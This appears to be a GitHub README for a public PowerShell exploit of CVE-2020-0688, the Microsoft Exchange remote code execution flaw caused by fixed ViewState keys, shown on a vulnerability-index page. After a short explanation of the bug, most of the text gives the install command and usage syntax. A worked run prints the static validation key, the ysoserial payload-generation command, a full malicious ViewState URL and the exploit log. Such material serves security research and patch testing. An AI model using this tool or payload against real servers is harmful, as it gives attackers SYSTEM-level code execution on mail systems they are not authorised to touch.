来源

关联漏洞

描述

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

介绍

# CVE-2020-0688

A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.

Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.

## About Vulnerability

The bug is found in the Exchange Control Panel (ECP) component. The nature of the bug is quite simple. Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same `validationKey` and `decryptionKey` values in `web.config`. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the `__VIEWSTATE` request parameter.

Due to the use of static keys, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel web application, which runs as SYSTEM. ([Source](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys))

## Getting Started

Thanks to these instructions, you can get a copy of the project up and run on your local machine for development and testing purposes.

### Prerequisites

- PowerShell

### Installation

```powershell
git clone https://github.com/MrTiz/CVE-2020-0688.git
```

## Usage

```powershell
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>
```

## Example

```powershell
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'

[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256

C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug

[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADtBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D

[*] Auto trigger payload...
[+] Status code: 500, Maybe success!
```

## Contributing

Contributions are what make the open source community such a good place to learn, inspire, and create. 
Any contributions you can provide are **greatly appreciated**.

1. Fork the Project
2. Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
3. Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
4. Push to the Branch (`git push origin feature/AmazingFeature`)
5. Open a Pull Request

## Authors

- **[Tiziano Marra](https://github.com/MrTiz)**

## Disclaimer

This exploit was developed and published for educational and research purposes only. The author assumes no responsibility for any illegal use. Use it at your own risk and only against systems for which you are authorized to test it.

## License
[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)

This project is licensed under the GNU General Public License v3.0 - see the 
[LICENSE](https://github.com/MrTiz/CVE-2020-0688/blob/master/LICENSE) file for details.

文件快照

 [4.0K]  /data/pocs/96b8022592c46e3f0dc16f94cc6d7da84ecb0475
├── [9.5K]  CVE-2020-0688.ps1
├── [ 34K]  LICENSE
├── [5.1K]  README.md
└── [4.0K]  ysoserial
    ├── [ 22K]  NDesk.Options.dll
    └── [133K]  ysoserial.exe

1 directory, 5 files

备注